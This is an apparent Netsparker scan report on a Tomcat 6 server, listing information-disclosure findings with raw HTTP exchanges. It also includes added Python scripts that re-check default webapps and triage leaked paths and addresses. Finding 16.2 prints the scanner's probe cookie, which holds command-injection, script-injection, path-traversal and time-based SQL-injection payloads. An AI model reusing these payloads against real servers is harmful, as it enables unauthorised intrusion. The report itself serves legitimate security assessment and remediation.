http://161.74.91.78:8080/docs
Extracted Version: Apache-Coyote/1.1
Certainty
Request
GET /docs HTTP/1.1
Cache-Control: no-cache
Referer: http://161.74.91.78:8080/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Accept-Language: en-us,en;q=0.5
Host: 161.74.91.78:8080
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 302 Moved Temporarily
Date: Fri, 25 Jan 2013 08:27:27 GMT
Transfer-Encoding: chunked
Server: Apache-Coyote/1.1
Location: http://161.74.91.78:8080/docs/
LOW (1 total)
11. Tomcat Exception Report Disclosure
Netsparker identified that the target web server is disclosing exception report data in the HTTP response.
Impact
An attacker can obtain information such as:
- Tomcat version.
- Physical file path of Tomcat files.
- Information about the generated exception.
This information might help an attacker to gain more information and to potentially focus on the development of further attacks to the target system.
Remedy
Apply the following configuration to your web.xml file to prevent information leakage by applying custom error pages.
    <error-page>
        <error-code>500</error-code>
        <location>/server_error.html</location>
    </error-page>
Remedy References: Custom Error Pages on Tomcat
Classification: OWASP A6, PCI v1.2-6.5.6, PCI v2.0-6.5.5, CWE-600, CAPEC-214, WASC-14
11.1. /examples/jsp/forward/forward.jsp
http://161.74.91.78:8080/examples/jsp/forward/forward.jsp
Certainty
Request
GET /examples/jsp/forward/forward.jsp HTTP/1.1
Cache-Control: no-cache
Referer: http://161.74.91.78:8080/examples/jsp/index.html
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Accept-Language: en-us,en;q=0.5
Host: 161.74.91.78:8080
Cookie: JSESSIONID=8CFCC592DC40DA02412C5EFC1A18A784
Accept-Encoding: gzip, deflate
Response
…noshade"><p><b>type</b> Exception report</p><p><b>message</b> <u></u></p><p><b>description</b> <u>The server encountered an internal error () that prevented it from fulfilling this request.</u></p><p><b>exception</b> <pre>org.apache.jasper.JasperException: An exception occurred processing JSP page /jsp/forward/forward.jsp at line 26
23: if (percent < 0.5) {
24: %>
25:
26: <jsp:forward page="one.jsp"/>
27:
28: <% } else { %>
29:
Stacktrace:
org.apache.jasper.servlet.JspServletWrapper.handleJspException(JspServletWrapper.java:521)
org.apache.jasper.servlet.JspServletWrapper.service(JspServletWrapper.java:424)
org.apache.jasper.servlet.JspServlet.serviceJspFile(JspServlet.java:313)
org.apache.jasper.servlet.JspServlet.service(JspServlet.java:260)
javax.servlet.http.HttpServlet.service(HttpServlet.java:717)</pre></p><p><b>root cause</b> <pre>java.lang.IllegalStateException: Illegal to clear() when buffer size == 0
org.apache.jasper.runtime.JspWriterImpl.clear(JspWriterImpl.java:147)
org.apache.jasper.runtime.PageContextImpl.doForward(PageContextImpl.java:689)
org.apache.jasper.runtime.PageContextImpl.forward(PageContextImpl.java:680)
com.liferay.portal.kernel.servlet.PageContextWrapper.forward(PageContextWrapper.java:57)
org.apache.jsp.jsp.forward.forward_jsp._jspService(forward_jsp.java:80)
org.apache.jasper.runtime.HttpJspBase.service(HttpJspBase.java:70)
javax.servlet.http.HttpServlet.service(HttpServlet.java:717)
org.apache.jasper.servlet.JspServletWrapper.service(JspServletWrapper.java:388)
org.apache.jasper.servlet.JspServlet.serviceJspFile(JspServlet.java:313)
org.apache.jasper.servlet.JspServlet.service(JspServlet.java:260)
javax.servlet.http.HttpServlet.service(HttpServlet.java:717)</pre></p><p><b>note</b> <u>The full stack trace of the root cause is available in the Apache Tomcat/6.0.35 logs.</u></p><HR size="1" noshade="noshade"><h3>A…
LOW: 1 TOTAL
12. [Possible] Internal IP Address Leakage
Netsparker discovered an internal IP address in the page. It was not determined whether the IP address was that of the system itself or that of an internal network.

Impact
This kind of information can be useful for an attacker when combined with other vulnerabilities.

Remedy
First ensure that this is not a false positive. Due to the nature of the issue, Netsparker could not confirm that this IP address was actually the real internal IP address of the target web server or internal network. If it is, consider removing it.

Classification
PCI v1.2-6.5.6, CWE-200

12.1. /docs/monitoring.html
http://161.74.91.78:8080/docs/monitoring.html

Extracted IP Address(es)
192.168.1.75
192.168.111.1
Certainty
Request
GET /docs/monitoring.html HTTP/1.1
Cache-Control: no-cache
Referer: http://161.74.91.78:8080/docs/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Accept-Language: en-us,en;q=0.5
Host: 161.74.91.78:8080
Accept-Encoding: gzip, deflate

Response
…basedir="."> <property name="jmx.server.name" value="localhost" /> <property name="jmx.server.port" value="9012" /> <property name="cluster.server.address" value="192.168.1.75" /> <property name="cluster.server.port" value="9025" /> <target name="state" description="Show JMX Cluster state"> <jmx:open host="${jmx.server.name}"…ost" port="9014" username="controlRole" password="tomcat" name="Catalina:type=IDataSender,host=localhost,senderAddress=192.168.111.1,senderPort=9025" attribute="connected" value="true" /> </and> </waitfor> <fail if="server.timeout…ost" port="9014" username="controlRole" password="tomcat" name="Catalina:type=IDataSender,host=localhost,senderAddress=192.168.111.1,senderPort=9025" attribute="connected" value="true" /> </and> </waitfor> <fail if="server.timeout…
INFORMATION: 1 TOTAL, 1 CONFIRMED
13. Forbidden Resource
Access to this resource has been denied by the web server. This is generally not a security issue and is reported here for information purposes.

Impact
There is no impact resulting from this issue.

13.1. /liferay-portal-6.1.0/image/ CONFIRMED
http://161.74.91.78:8080/liferay-portal-6.1.0/image/

Request
GET /liferay-portal-6.1.0/image/ HTTP/1.1
Cache-Control: no-cache
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Accept-Language: en-us,en;q=0.5
Host: 161.74.91.78:8080
Cookie: JSESSIONID=70C60A1A8A9C234A451A8DCB1F4B4F8C; GUEST_LANGUAGE_ID=en_US; COOKIE_SUPPORT=true
Accept-Encoding: gzip, deflate

Response
HTTP/1.1 403 Forbidden
Cache-Control: max-age=315360000, public
Date: Fri, 25 Jan 2013 08:32:10 GMT
Server: Apache-Coyote/1.1
Vary: Accept-Encoding
ETag: "0"
Content-Length: 0
Expires: Mon, 23 Jan 2023 08:32:10 GMT
INFORMATION: 1 TOTAL
14. E-mail Address Disclosure
Netsparker found e-mail addresses on the website.

Impact
E-mail addresses discovered within the application can be used by both spam e-mail engines and brute-force tools. Furthermore, valid e-mail addresses may lead to social-engineering attacks.

Remedy
Use generic e-mail addresses such as contact@ or info@ for general communications, and remove user- or people-specific e-mail addresses from the website. Should user-specific contact be required, use submission forms for this purpose.

External References
Wikipedia - E-Mail Spam

Classification
OWASP A6, PCI v1.2-6.5.6, CWE-200, CAPEC-118, WASC-13

14.1. /
http://161.74.91.78:8080/

Found E-mail Address(es)
[email protected]@tomcat.apache.org (the addresses are obfuscated in this transcript; the response excerpt below identifies them as the two Tomcat project mailing-list addresses linked from the default Tomcat start page)
Certainty
Request
GET / HTTP/1.1
Cache-Control: no-cache
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Accept-Language: en-us,en;q=0.5
Host: 161.74.91.78:8080
Accept-Encoding: gzip, deflate

Response
…an introductory guide to developing web applications.</p> <p>Tomcat mailing lists are available at the Tomcat project web site:</p> <ul> <li><b><a href="mailto:[email protected]">[email protected]</a></b> for general questions related to configuring and using Tomcat</li> <li><b><a href="mailto:[email protected]">[email protected]</a></b> for developers working on Tomcat</li> </ul> <p>Thanks for using Tomcat!</p> <p id="footer"><img src="tomcat-power.gif" width="77" height="80" alt="Powered…
INFORMATION: 1 TOTAL
15. Default Tomcat Page Identified
Netsparker identified a default Tomcat page. This issue is reported for information only. If any other vulnerability is identified regarding this resource, Netsparker will report it as a separate issue.

15.1. /examples/jsp/index.html
http://161.74.91.78:8080/examples/jsp/index.html
Certainty
Request
GET /examples/jsp/index.html HTTP/1.1
Cache-Control: no-cache
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Accept-Language: en-us,en;q=0.5
Host: 161.74.91.78:8080
Accept-Encoding: gzip, deflate

Response
…59-1"> <meta name="GENERATOR" content="Mozilla/4.61 [en] (WinNT; I) [Netscape]"> <meta name="Author" content="Anil K. Vijendran"> <title>JSP Examples</title></head><body bgcolor="#FFFFFF"><b><font face="Arial, Helvetica, sans-serif"><font size=+2>JSP Samples</font></font></b><p>This is a collection of samples demonstrating the usage of different parts of the Java Server Pages (JSP) specification. Both JSP 2.0 and JSP 1.2 examples are presented below.<p>These examples will only work when these pages are being served by a servlet engine; of …
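Finding 15, together with the /docs/, /RELEASE-NOTES.txt and /manager/status paths that recur throughout this report, shows that the webapps bundled with a stock Tomcat 6 install (ROOT, docs, examples, manager) were left deployed on the target, and the forward.jsp response earlier in the report shows Tomcat's built-in error report page sending a full stack trace to the client. The script below is an added example, not Netsparker's code or Tomcat's, for re-checking both conditions after the default webapps have been undeployed and an error-page has been configured. It probes through an injectable fetch function so it can be exercised offline with a fake; the live http_fetch helper and the probe paths for the servlet examples and /manager/html are assumptions chosen to match the default Tomcat 6 layout, not URLs taken from this report.

```python
import sys
import urllib.error
import urllib.request

# Paths served only because the stock Tomcat 6 webapps (ROOT, docs, examples,
# manager) are still deployed. The first four are reachable in this report;
# /manager/html is assumed from the /manager/status Referer seen in finding 16.8.
DEFAULT_WEBAPP_PROBES = {
    "/docs/": "Tomcat documentation webapp",
    "/examples/jsp/index.html": "Tomcat JSP examples",
    "/examples/servlets/servlet/CookieExample": "Tomcat servlet examples",
    "/RELEASE-NOTES.txt": "Tomcat ROOT webapp release notes",
    "/manager/html": "Tomcat Manager application",
}

# Fragments of Tomcat's default error report page; two or more together mean the
# stack trace is being sent to the client (compare the forward.jsp response above).
STACK_TRACE_MARKERS = ("Exception report", "Stacktrace:", "<b>root cause</b>", ".java:")


def check_default_webapps(fetch):
    """fetch(path) -> (status, body). Returns {path: description} for every default
    webapp path still reachable. A 401 counts: the Manager is deployed and only its
    password stands between an attacker and remote WAR deployment."""
    exposed = {}
    for path, what in DEFAULT_WEBAPP_PROBES.items():
        status, _ = fetch(path)
        if status == 200:
            exposed[path] = what
        elif status == 401:
            exposed[path] = what + " (authentication required)"
    return exposed


def leaks_stack_trace(body):
    """True if the body looks like Tomcat's default error report with a stack trace."""
    return sum(marker in body for marker in STACK_TRACE_MARKERS) >= 2


def check_error_page(fetch, error_path="/examples/jsp/forward/forward.jsp"):
    """Request a page known to fail (forward.jsp in this report) and say whether the
    5xx response still carries the stack trace instead of a custom error page."""
    status, body = fetch(error_path)
    return status >= 500 and leaks_stack_trace(body)


def http_fetch(base_url):
    """Real fetch for live use; base_url like http://host:8080 without a trailing slash."""
    def fetch(path):
        req = urllib.request.Request(base_url + path, headers={"User-Agent": "tomcat-default-check"})
        try:
            with urllib.request.urlopen(req, timeout=10) as resp:
                return resp.status, resp.read().decode("utf-8", "replace")
        except urllib.error.HTTPError as err:  # urllib raises on 4xx/5xx; keep the status
            return err.code, err.read().decode("utf-8", "replace")
    return fetch


if __name__ == "__main__":
    if len(sys.argv) != 2:
        sys.exit("usage: tomcat_default_check.py http://host:port")
    live = http_fetch(sys.argv[1])
    for path, what in check_default_webapps(live).items():
        print(f"still deployed: {path}  ({what})")
    print("stack trace in error page:", check_error_page(live))
```

Run it against the base URL after remediation; the goal is an empty "still deployed" list and False for the error page. Removing $CATALINA_HOME/webapps/docs and webapps/examples closes findings 12.1, 15.1 and every /docs/ entry under 16 at once, since all of that content is the bundled documentation rather than anything the site needs.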
INFORMATION: 25 TOTAL
16. [Possible] Internal Path Leakage (*nix)
Netsparker identified an internal path in the document.

Impact
There is no direct impact; however, this information can help an attacker either to identify other vulnerabilities or during the exploitation of other identified vulnerabilities.

Remedy
First ensure that this is not a false positive. Due to the nature of the issue, Netsparker could not confirm that this file path was actually the real file path of the target web server.
Error messages should be disabled. Remove this kind of sensitive data from the output.

External References
OWASP - Full Path Disclosure

Classification
PCI v1.2-6.5.6, CWE-200, CAPEC-118, WASC-13
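Findings 12, 14 and 16 all open with the same instruction: confirm the finding is not a false positive before acting on it. In this report that check is mechanical. Every hit under /docs/ and /examples/ comes from the stock Tomcat documentation webapp (the 192.168.x.x addresses in 12.1 are the example values in the cluster build file shown on monitoring.html), the paths rooted at $CATALINA_HOME or ${java.home} are template placeholders rather than locations on the host, and the error_log paths in 16.2 below are the scanner's own traversal payload echoed back by the CookieExample servlet. The script below is an added example, not Netsparker's code or Tomcat's, that automates that triage over a raw request/response pair: it extracts internal IP addresses, *nix paths and e-mail addresses from the response and labels each as reflected payload, documentation placeholder, bundled documentation, or worth a human look. The sample exchanges are constructed from the evidence excerpts in findings 12.1, 16.2 and 14.1; the /app/login exchange, the config.properties path and the list@example.org address are invented for illustration.

```python
import ipaddress
import re
from urllib.parse import unquote

# Tokenise HTML/text without parsing it: split on whitespace, tag brackets,
# quotes and the = , ; ( ) separators that surround values in scanner excerpts.
TOKEN_SPLIT = re.compile(r"""[\s<>"'=(),;]+""")
# An absolute *nix path of two or more components, optionally preceded by a
# ../ traversal prefix or a placeholder root such as $CATALINA_HOME or ${java.home}.
PATH_RE = re.compile(
    r"^((?:\.\./)*\.\.|\$\{?[A-Za-z_][A-Za-z0-9_.]*\}?)?((?:/[A-Za-z0-9_.\-]+){2,}/?)$"
)
IP_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")

# URL prefixes under which a stock Tomcat install serves its own documentation
# and samples: anything found there belongs to the docs, not to the host.
BUNDLED_DOC_PREFIXES = ("/docs/", "/examples/", "/RELEASE-NOTES.txt")


def is_internal_ip(text):
    """RFC 1918, loopback or link-local: the addresses finding 12 is about."""
    try:
        ip = ipaddress.ip_address(text)
    except ValueError:
        return False
    return ip.is_private or ip.is_loopback or ip.is_link_local


def classify(token, url_path, decoded_request):
    """The three questions a triager asks before accepting a [Possible] finding,
    in the order that matters: reflection first, then documentation artefacts."""
    if token in decoded_request:
        return "reflected-payload"   # our own input echoed back (finding 16.2)
    if token.startswith("$"):
        return "placeholder-path"    # $CATALINA_HOME/... is a template, not a location
    if url_path.startswith(BUNDLED_DOC_PREFIXES):
        return "bundled-docs"        # stock Tomcat docs/examples (12.1, 16.1, 16.10, ...)
    return "review"                  # unexplained: a human should look at it


def triage(url_path, request, response):
    """Return sorted (kind, value, verdict) tuples for every internal IP address,
    *nix path and e-mail address in `response`, deduplicated on (kind, value)."""
    decoded_request = unquote(request)   # %2f-encoded payloads must match too
    seen = {}
    for tok in TOKEN_SPLIT.split(response):
        m = PATH_RE.match(tok)
        if m:  # report the absolute part, but test reflection on the whole token
            seen.setdefault(("path", m.group(2)), classify(tok, url_path, decoded_request))
    for ip in IP_RE.findall(response):
        if is_internal_ip(ip):
            seen.setdefault(("ip", ip), classify(ip, url_path, decoded_request))
    for addr in EMAIL_RE.findall(response):
        seen.setdefault(("email", addr), classify(addr, url_path, decoded_request))
    return sorted((kind, value, verdict) for (kind, value), verdict in seen.items())


# --- Constructed samples, modelled on the evidence excerpts in this report -----------
DOCS_REQUEST = "GET /docs/monitoring.html HTTP/1.1\r\nHost: 161.74.91.78:8080\r\n\r\n"
DOCS_RESPONSE = (
    'HTTP/1.1 200 OK\r\n\r\n<property name="cluster.server.address" value="192.168.1.75" />'
    ' name="Catalina:type=IDataSender,host=localhost,senderAddress=192.168.111.1,senderPort=9025"'
    ' <code>$CATALINA_HOME/lib/catalina.jar</code> uses the <code>/etc/passwd</code> file'
)
TRAVERSAL = "../" * 10
COOKIE_REQUEST = (
    "POST /examples/servlets/servlet/CookieExample HTTP/1.1\r\nHost: 161.74.91.78:8080\r\n"
    "Cookie: " + TRAVERSAL + "etc/httpd/logs/error.log=3\r\n\r\n"
    "cookiename=" + "..%2f" * 10 + "etc%2fhttpd%2flogs%2ferror_log&cookievalue=3"
)
COOKIE_RESPONSE = (
    "HTTP/1.1 200 OK\r\nSet-Cookie: " + TRAVERSAL + "etc/httpd/logs/error_log=3\r\n\r\n"
    "<html>Cookie Name: " + TRAVERSAL + "etc/httpd/logs/error.log<br> Cookie Value: 3<br>"
    "You just sent the following cookie to your browser:<br>Name: " + TRAVERSAL
    + "etc/httpd/logs/error_log<br>Value: 3</html>"
)
ROOT_REQUEST = "GET / HTTP/1.1\r\nHost: 161.74.91.78:8080\r\n\r\n"
ROOT_RESPONSE = '<a href="mailto:list@example.org">list@example.org</a>'   # invented address
APP_REQUEST = "GET /app/login HTTP/1.1\r\nHost: 161.74.91.78:8080\r\n\r\n"   # invented app
APP_RESPONSE = (
    "HTTP/1.1 500 Internal Server Error\r\n\r\n<pre>java.io.FileNotFoundException: "
    "/var/lib/tomcat6/webapps/app/WEB-INF/config.properties (No such file or directory)</pre>"
)

if __name__ == "__main__":
    for path, req, resp in [("/docs/monitoring.html", DOCS_REQUEST, DOCS_RESPONSE),
                            ("/examples/servlets/servlet/CookieExample", COOKIE_REQUEST, COOKIE_RESPONSE),
                            ("/", ROOT_REQUEST, ROOT_RESPONSE),
                            ("/app/login", APP_REQUEST, APP_RESPONSE)]:
        for kind, value, verdict in triage(path, req, resp):
            print(f"{path:42} {kind:6} {verdict:18} {value}")
```

The order of the checks in classify is deliberate: 16.2 sits under /examples/, but a value that already appears in the request is a reflection regardless of where it was found, so the reflection test runs before the documentation test. Only the "review" verdicts deserve the remedy in finding 16; in this report the invented /app/login case is the only one that would earn it.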
16.1. /docs/jasper-howto.html
http://161.74.91.78:8080/docs/jasper-howto.html

Identified Internal Path(s)
/bin/catalina-tasks.xml
/bin/ant
Certainty
Request
GET /docs/jasper-howto.html HTTP/1.1
Cache-Control: no-cache
Referer: http://161.74.91.78:8080/docs/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Accept-Language: en-us,en;q=0.5
Host: 161.74.91.78:8080
Accept-Encoding: gzip, deflate

Response
…ght="1" width="1" alt="" src="./images/void.gif"></td><td height="1" bgcolor="#ffffff"><pre><project name="Webapp Precompilation" default="all" basedir="."> <import file="${tomcat.home}/bin/catalina-tasks.xml"/> <target name="jspc"> <jasper validateXml="false" uriroot="${webapp.path}" webXmlFragment="${webapp.path}/WEB-INF/generated_web.xml…/void.gif"></td></tr><tr><td width="1" bgcolor="#023264"><img border="0" hspace="0" vspace="0" height="1" width="1" alt="" src="./images/void.gif"></td><td height="1" bgcolor="#ffffff"><pre>$ANT_HOME/bin/ant -Dtomcat.home=<$TOMCAT_HOME> -Dwebapp.path=<$WEBAPP_PATH></pre></td><td width="1" bgcolor="#023264"><img border="0" hspace="0" vspace="0" height="1" width="1" alt="" src="./images/void.g…

16.2. /examples/servlets/servlet/CookieExample
http://161.74.91.78:8080/examples/servlets/servlet/CookieExample

Identified Internal Path(s)
/etc/httpd/logs/error.log
/etc/httpd/logs/error_log
Certainty
Request
POST /examples/servlets/servlet/CookieExample HTTP/1.1
Cache-Control: no-cache
Referer: http://161.74.91.78:8080/examples/servlets/servlet/CookieExample
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Accept-Language: en-us,en;q=0.5
Host: 161.74.91.78:8080
Cookie: '=3; NS1NO=3; Smith="&ping -c 26 127.0.0.1 &"; %27=3; '"--></style></script><script>netsparker(0x000964)</script>=3; ../../../../../../../../../../boot.ini=3; ..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini=3; /../../../../../../../../../../boot.ini=3; file:/windows/win.ini=3; ../../../../../../../../../../windows/win.ini=3; c:\windows\win.ini=3; ../../../../../../../../../../windows/iis6.log=3; ../../../../../../../../../../proc/self/fd/2=3; ../../../../../../../../../../etc/httpd/logs/error.log=3; $Version=1; Smith="-1' or 1=(SELECT 1 FROM (SELECT SLEEP(25))A)+'"; JSESSIONID=8CFCC592DC40DA02412C5EFC1A18A784
Accept-Encoding: gzip, deflate
Content-Length: 105
Content-Type: application/x-www-form-urlencoded

cookiename=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fhttpd%2flogs%2ferror_log&cookievalue=3
Response
HTTP/1.1 200 OK
Date: Fri, 25 Jan 2013 09:13:46 GMT
Server: Apache-Coyote/1.1
Set-Cookie: ../../../../../../../../../../etc/httpd/logs/error_log=3
Content-Length: 1959
Content-Type: text/html

<html><body bgcolor="white"><head><title>Cookies Example</title></head><body><a href="../cookies.html"><img src="../images/code.gif" …./../../../../../../../windows/iis6.log<br> Cookie Value: 3<br><br>Cookie Name: ../../../../../../../../../../proc/self/fd/2<br> Cookie Value: 3<br><br>Cookie Name: ../../../../../../../../../../etc/httpd/logs/error.log<br> Cookie Value: 3<br><br>Cookie Name: Smith<br> Cookie Value: -1' or 1=(SELECT 1 FROM (SELECT SLEEP(25))A)+'<br><br>Cookie Name: JSESSIONID<br> Cookie Value: 8CFCC592DC40DA02412C5EFC1A18A784<br><br><P>You just sent the following cookie to your browser:<br>Name: ../../../../../../../../../../etc/httpd/logs/error_log<br>Value: 3<P>Create a cookie to send to your browser<br><form action="CookieExample" method=POST>Name: <input type=text length=20 name=cookiename><br>Value: <input type=text length=20 nam…

16.3. /docs/building.html
http://161.74.91.78:8080/docs/building.html

Identified Internal Path(s)
/usr/share/java
/home/me/some-place-to-download-to
Certainty
Request
GET /docs/building.html HTTP/1.1
Cache-Control: no-cache
Referer: http://161.74.91.78:8080/docs/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Accept-Language: en-us,en;q=0.5
Host: 161.74.91.78:8080
Accept-Encoding: gzip, deflate

Response
…code><br> cd ${tomcat.source}<br> ant download<br> ant<br></code></p><p><b>WARNING:</b> Running "ant download" command will download libraries required to build Tomcat to the <code>/usr/share/java</code> directory by default. On a typical Linux or MacOX system, an ordinary user will not have access to write to this directory, and, even if you do, it may not be appropriate for you to writ…n<br><br> # ----- Default Base Path for Dependent Packages -----<br> # Replace this path with the directory path where<br> # dependencies binaries should be downloaded.<br> base.path=/home/me/some-place-to-download-to<br></code></p></blockquote></td></tr></table><table cellpadding="2" cellspacing="0" border="0"><tr><td bgcolor="#525D76"><font face="arial,helvetica.sanserif" color="#ffffff"><a name="Building wi…

16.4. /docs/security-manager-howto.html
http://161.74.91.78:8080/docs/security-manager-howto.html

Identified Internal Path(s)
/lib/-
/lib/ext/-
/bin/commons-daemon.jar
/bin/tomcat-juli.jar
/bin/bootstrap.jar
/lib/driver.jar!/-
/lib/scrape.jar!/-
/bin/catalina.sh
Certainty
Request
GET /docs/security-manager-howto.html HTTP/1.1
Cache-Control: no-cache
Referer: http://161.74.91.78:8080/docs/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Accept-Language: en-us,en;q=0.5
Host: 161.74.91.78:8080
Accept-Encoding: gzip, deflate
Response
…==============================================
// ========== SYSTEM CODE PERMISSIONS =========================================
// These permissions apply to javac
grant codeBase "file:${java.home}/lib/-" {
    permission java.security.AllPermission;
};
// These permissions apply to all shared system extensions
grant codeBase "file:${java.home}/jre/lib/ext/-" {
    permission java.security.AllPermission;
};
// These permissions apply to javac when ${java.home] points at $JAVA_HOME/jre
grant codeBase "file:${java.home}/../lib/-" {
    permission java.security.AllPermission;
};
// These permissions apply to all shared system extensions when
// ${java.home} points at $JAVA_HOME/jre
grant codeBase "file:${java.home}/lib/ext/-" {
    permission java.security.AllPermission;
};
// ========== CATALINA CODE PERMISSIONS =======================================
// These permissions apply to the daemon code
grant codeBase "file:${catalina.home}/bin/commons-daemon.jar" {
    permission java.security.AllPermission;
};
// These permissions apply to the logging API
// Note: If tomcat-juli.jar is in ${catalina.base} and not in ${catalina.home},
// update this section accordingly.
// grant codeBase "file:${catalina.base}/bin/tomcat-juli.jar" {..}
grant codeBase "file:${catalina.home}/bin/tomcat-juli.jar" {
    permission java.io.FilePermission "${java.home}${file.separator}lib${file.separator}logging.properties", "read";
    permission java.io.FilePermission "${catalina.b…file.separator}WEB-INF
    // ${file.separator}classes${file.separator}logging.properties", "read";
};
// These permissions apply to the server startup code
grant codeBase "file:${catalina.home}/bin/bootstrap.jar" {
    permission java.security.AllPermission;
};
// These permissions apply to the servlet API classes
// and those that are shared across all class loaders
// located in the "lib" directory
grant codeBase "file:${catalina.home}/lib/-" {
    permission java.security.AllPermission;
};
// If using a per instance lib directory, i.e. ${catalina.base}/lib,
// then the following permission will need to be uncommented
// grant codeBase "file:${catalina.base}/lib/-" {
//     permission java.security.AllPermission;
// };
// ========== WEB APPLICATION PERMISSIONS =====================================
// These permissions are granted by default to all web …grant codeBase "file:${catalina.base}/webapps/examples/WEB-INF/classes/-" {
// };
//
// The permission granted to your JDBC driver
// grant codeBase "jar:file:${catalina.base}/webapps/examples/WEB-INF/lib/driver.jar!/-" {
//     permission java.net.SocketPermission "dbhost.mycompany.com:5432", "connect";
// };
// The permission granted to the scrape taglib
// grant codeBase "jar:file:${catalina.base}/webapps/examples/WEB-INF/lib/scrape.jar!/-" {
//     permission java.net.SocketPermission "*.noaa.gov:80", "connect";
// };</pre></td><td width="1" bgcolor="#023264"><img border="0" hspace="0" vspace="0" height="1" width="1" alt="" src="./….gif"></td></tr><tr><td width="1" bgcolor="#023264"><img border="0" hspace="0" vspace="0" height="1" width="1" alt="" src="./images/void.gif"></td><td height="1" bgcolor="#ffffff"><pre>$CATALINA_HOME/bin/catalina.sh start -security (Unix)
%CATALINA_HOME%\bin\catalina start -security (Windows)</pre></td><td width="1" bgcolor="#023264"><img border="0" hspace="0" vspace="0" height="1" width="1" alt="" src=…

16.5. /RELEASE-NOTES.txt
http://161.74.91.78:8080/RELEASE-NOTES.txt

Identified Internal Path(s)
/lib/driver.jar
Certainty
Request
GET /RELEASE-NOTES.txt HTTP/1.1
Cache-Control: no-cache
Referer: http://161.74.91.78:8080/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Accept-Language: en-us,en;q=0.5
Host: 161.74.91.78:8080
Accept-Encoding: gzip, deflate

Response
…=
In order to grant security permissions to JARs located inside the web application repository, use URLs of of the following format in your policy file:
file:${catalina.base}/webapps/examples/WEB-INF/lib/driver.jar
============================
Symlinking static resources:
============================
By default, Unix symlinks will not work when used in a web application to link resources located outside the w…

16.6. /docs/realm-howto.html
http://161.74.91.78:8080/docs/realm-howto.html

Identified Internal Path(s)
/lib/catalina.jar
/bin/tomcat-juli.jar
Certainty
Request
GET /docs/realm-howto.html HTTP/1.1
Cache-Control: no-cache
Referer: http://161.74.91.78:8080/docs/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Accept-Language: en-us,en;q=0.5
Host: 161.74.91.78:8080
Accept-Encoding: gzip, deflate

Response
…t;login-config></code>. If not specified in web.xml, the default value of <code>Authentication required</code> is used.</p><p>To use either of the above techniques, the <code>$CATALINA_HOME/lib/catalina.jar</code> and <code>$CATALINA_HOME/bin/tomcat-juli.jar</code> files will need to be on your class path to make the <code>RealmBase</code> class available.</p><p>Non-ASCII usernames and/or passwords are supported using<div align="left"><table border="…

16.7. /docs/ssl-howto.html
http://161.74.91.78:8080/docs/ssl-howto.html

Identified Internal Path(s)
/bin/keytool
/dev/urandom
/usr/local/ssl/server.crt
/usr/local/ssl/server.pem
Certainty
Request
GET /docs/ssl-howto.html HTTP/1.1
Cache-Control: no-cache
Referer: http://161.74.91.78:8080/docs/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Accept-Language: en-us,en;q=0.5
Host: 161.74.91.78:8080
Accept-Encoding: gzip, deflate

Response
